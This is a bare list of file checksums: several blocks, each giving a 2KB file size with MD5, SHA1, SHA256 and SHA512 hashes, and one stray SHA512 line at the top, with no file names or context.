SHA512: c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Filesize: 2KB
MD5: f313c5b4f95605026428425586317353
SHA1: 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256: 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512: b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Filesize: 2KB
MD5: ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1: a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256: 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512: 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Filesize: 2KB
MD5: 7d612892b20e70250dbd00d0cdd4f09b
SHA1: 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256: 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512: f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Filesize: 2KB
MD5: 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1: 5fd0a67671430f66237f483eef39ff599b892272
SHA256: 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512: 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Filesize: 2KB
MD5: 0b990e24f1e839462c0ac35fef1d119e
SHA1: 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256: a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512: c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4